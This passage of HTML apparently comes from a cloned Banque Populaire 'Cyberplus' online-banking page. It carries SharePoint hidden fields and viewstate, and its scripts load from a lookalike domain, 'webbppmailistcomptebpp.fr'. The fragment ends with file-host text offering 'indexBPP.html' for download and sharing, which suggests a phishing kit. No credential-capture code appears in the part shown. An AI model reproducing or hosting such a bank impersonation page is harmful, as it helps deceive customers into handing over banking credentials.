<input type="hidden" name="MSOWebPartPage_Shared" id="MSOWebPartPage_Shared" value="">
<input type="hidden" name="MSOLayout_LayoutChanges" id="MSOLayout_LayoutChanges" value="">
<input type="hidden" name="MSOLayout_InDesignMode" id="MSOLayout_InDesignMode" value="">
<input type="hidden" name="MSOSPWebPartManager_OldDisplayModeName" id="MSOSPWebPartManager_OldDisplayModeName" value="Browse">
<input type="hidden" name="MSOSPWebPartManager_StartWebPartEditingName" id="MSOSPWebPartManager_StartWebPartEditingName" value="false">
<input type="hidden" name="MSOSPWebPartManager_EndWebPartEditing" id="MSOSPWebPartManager_EndWebPartEditing" value="false">
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNDAxNjA0OTYzD2QWAmYPZBYCAgEPZBYEAgEPZBYEAgYPZBYCZg9kFgICAQ8WAh4TUHJldmlvdXNDb250cm9sTW9kZQspiAFNaWNyb3NvZnQuU2hhcmVQb2ludC5XZWJDb250cm9scy5TUENvbnRyb2xNb2RlLCBNaWNyb3NvZnQuU2hhcmVQb2ludCwgVmVyc2lvbj0xNC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj03MWU5YmNlMTExZTk0MjljAWQCGA8PFgIeB1Zpc2libGVoZGQCAw9kFgQCEg9kFgQCFw9kFmICBQ8WAh8BaGQCCQ8WAh8BaGQCCw8WAh8BaGQCDQ8WAh8ACysEAWQCEQ8WAh8ACysEAWQCEw8WAh8ACysEAWQCFQ8WAh8ACysEAWQCFw8WAh8ACysEAWQCGQ8WAh8ACysEAWQCGw8WAh8ACysEAWQCHQ8WAh8ACysEAWQCHw8WAh8ACysEAWQCIQ8WAh8ACysEAWQCIw8WAh8ACysEAWQCJQ8WAh8ACysEAWQCJw8WAh8ACysEAWQCKQ8WAh8ACysEAWQCKw8WAh8ACysEAWQCLQ8WAh8ACysEAWQCLw8WAh8ACysEAWQCMQ8WAh8ACysEAWQCMw8WAh8ACysEAWQCNQ8WAh8ACysEAWQCNw8WAh8ACysEAWQCOQ8WAh8ACysEAWQCOw8WAh8ACysEAWQCPQ8WAh8ACysEAWQCPw8WAh8ACysEAWQCQQ8WAh8ACysEAWQCQw8WAh8ACysEAWQCRQ8WAh8ACysEAWQCRw8WAh8ACysEAWQCSQ8WAh8ACysEAWQCSw8WAh8ACysEAWQCTQ8WAh8ACysEAWQCTw8WAh8ACysEAWQCUQ8WAh8ACysEAWQCUw8WAh8ACysEAWQCVQ8WAh8ACysEAWQCVw8WAh8ACysEAWQCWQ8WAh8ACysEAWQCWw8WAh8ACysEAWQCXQ8WAh8ACysEAWQCXw8WAh8ACysEAWQCYQ8WAh8ACysEAWQCYw8WAh8ACysEAWQCZQ8WAh8ACysEAWQCZw8WAh8ACysEAWQCaQ8WAh8ACysEAWQCGw9kFgQCAQ9kFgICAQ9kFgJmD2QWAmYPD2QWBh4FY2xhc3MFIm1zLXNidGFibGUgbXMtc2J0YWJsZS1leCBzNC1zZWFyY2geC2NlbGxwYWRkaW5nBQEwHgtjZWxsc3BhY2luZwUBMBYCZg9kFgJmD2QWAgIBDxYCHwIFFnNyY2gtQXV0b0NvbXBDb250YWluZXIWAmYPFgIfAgUUc3JjaC1BdXRvQ29tcERyb3BJbWdkAgsPZBYCZg8WAh8BaBYCZg9kFgJmD2QWBAIBDxYCHgRUZXh0BR5NYSBiYW5xdWUgcG9wdWxhaXJlIHLDqWdpb25hbGVkAgUPZBYGAgEPZBYCAgEPDxYEHwUFFExlIHNpdGUgZGUgbWEgYmFucXVlHgdUb29sVGlwBRRMZSBzaXRlIGRlIG1hIGJhbnF1ZWRkAgMPZBYCAgEPDxYGHwUFKkNvbnRhY3RlciB1biBjb25zZWlsbGVyIGRhbnMgdm90cmUgcsOpZ2lvbh8GBSpDb250YWN0ZXIgdW4gY29uc2VpbGxlciBkYW5zIHZvdHJlIHLDqWdpb24eC05hdmlnYXRlVXJsZGRkAgUPZBYKAgEPDxYCHwUFElRyb3V2ZXIgdW5lIGFnZW5jZWRkAgMPDxYCHwUFElZpbGxlLCBjb2RlIHBvc3RhbGRkAgUPDxYCHwUFAk9LZGQCBw8PFgIeC1Bvc3RCYWNrVXJsZGRkAgkPDxYCHgxFcnJvck1lc3NhZ2UFJU1lcmNpIGRlIHNhaXNpciB1biBjb2RlIHBvc3RhbCB2YWxpZGVkZAIwD2QWAmYPFCsAA2RkZGRk3LoasP3r1fNGCUNqk3E2LZctzWA=">
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
    theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]>
</script>


<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/WebResource.axd" type="text/javascript"></script>


<script type="text/javascript">
//<![CDATA[
var MSOWebPartPageFormName = 'aspnetForm';
var g_presenceEnabled = true;var _fV4UI=true;var _spPageContextInfo = {webServerRelativeUrl: "\u002fportailinternet\u002fEditorial\u002fInformations", webLanguage: 1036, currentLanguage: 1036, webUIVersion:4,pageListId:"{4b969394-b7a1-42f2-b7bb-0fd3856d436e}",pageItemId:1243, alertsEnabled:true, siteServerRelativeUrl: "\u002fportailinternet", allowSilverlightPrompt:'True'};//]]>
</script>
<script type="text/javascript" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/init.js(1).téléchargement"></script>
<script type="text/javascript">
//<![CDATA[
var tmnTags = [];//]]>
</script>
<script type="text/javascript">
<!--
var L_Menu_BaseUrl="/portailinternet/Editorial/Informations";
var L_Menu_LCID="1036";
var L_Menu_SiteTheme="";
//-->
</script><script type="text/javascript">
<!--
//-->
</script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ScriptResource.axd" type="text/javascript"></script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ScriptResource(1).axd" type="text/javascript"></script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ScriptResource(2).axd" type="text/javascript"></script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/Search.js.téléchargement" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
UpdateFormDigest('\u002fportailinternet\u002fEditorial\u002fInformations', 1440000);if (typeof(vwpcm) != 'undefined') {vwpcm.SetWpcmVal();};if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;if (typeof(_spFormOnSubmitWrapper) != 'undefined') {return _spFormOnSubmitWrapper();} else {return true;};
return true;
}
//]]>
</script>

<div>

    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="A535C0EC">
    <input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="wMI-jY3SNRYRCAZFmEaP_RWR6ZyP4Au8tYTCxyVIgCE1bEVzf7p8L0sRb1RAl1rmF15VvX-H8NxWoCouPNoxHkzDO_PHGpqsrGzGWwxFXE41h7S28yRjirhlZODuabfDeepuG36T2RhAAywe2P_lEIFSj1w1">
    <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWMgKmgKaSDwKR5IiXBgLGysyEDALD3cSmBwKClst9Ar3EkMILAtb3oKMMAs7vmqcLAs7vmqcLAvea+5oFAqqphcoHAsPd4PcOAqeOh70JAqzCr9AKAoT1hcsJArC24+sMAs/O5vcGAuyD/gkCkMfDiAwCiOfc8AUCq/vXwAsCt9Ov9AcCw/ek2QgC+7DLQAK5xsaZDAKEgPCgAwK9ytSTDQLIhYqWCgLTivjnBQKpn4s6AqeK3OUGAqeK3OUGAq/qqcACAsKekYIGAt626bYKAsGnmrsOAuXkgcgLAs+i/Y4LAvjipfgKApDr6+4JAq+k/vIMApvW8LILAri8tc4GAv/Hi78IAq7xuqkGAsHQipkJAq3BtiMCvrHM3AcC7svL0AQCvrHQ3AcRN6+if4dHUr+fbcFhMoFVB2iq9w==">
</div>
    <span></span>
    <div class="hidden-fields">
        <span id="ctl00_ApplicationParametersControl1"><input type="hidden" name="fPageUrl" id="fPageUrl" value="Pages%2fACCES_CYBERPLUS.aspx"><input type="hidden" name="fWebId" id="fWebId" value="/portailinternet/Editorial/Informations"><input type="hidden" name="fListId" id="fListId" value="4b969394-b7a1-42f2-b7bb-0fd3856d436e"><input type="hidden" name="fItemId" id="fItemId" value="1243"><input type="hidden" name="fBocMode" id="fBocMode" value="bpr"><input type="hidden" name="fSiteUrl" id="fSiteUrl" value="http://www.massifcentral.banquepopulaire.fr/portailinternet"><input type="hidden" name="fItemCt" id="fItemCt" value="Actualite"><input type="hidden" name="fItemPageState" id="fItemPageState" value="Privatif"></span>
        <input id="RibbonContainer_activeTabId" name="ctl00$ctl28" type="hidden" value="">
        <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$panelZone','tctl00$PlaceHolderRightMenu$ctl01'], [], [], 90);
//]]>
</script>

        
        <script type="text/javascript" language="javascript">
            function ProcessImn(){
                ULSA13:;
            }
            function ProcessImnMarkers() {
                ULSA13:;
            }
        </script>
        
        <span id="TurnOnAccessibility" style="display: none" class="s4-notdlg"><a id="linkTurnOnAcc" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/ACCES_CYBERPLUS.aspx?vary=0-0-0#" class="ms-TurnOnAcc" onclick="SetIsAccessibilityFeatureEnabled(true);UpdateAccessibilityUI();document.getElementById(&#39;linkTurnOffAcc&#39;).focus();return false;">


Partager le fichier indexBPP.html sur le Web et les réseaux sociaux:


Télécharger le fichier indexBPP.html


Télécharger indexBPP.html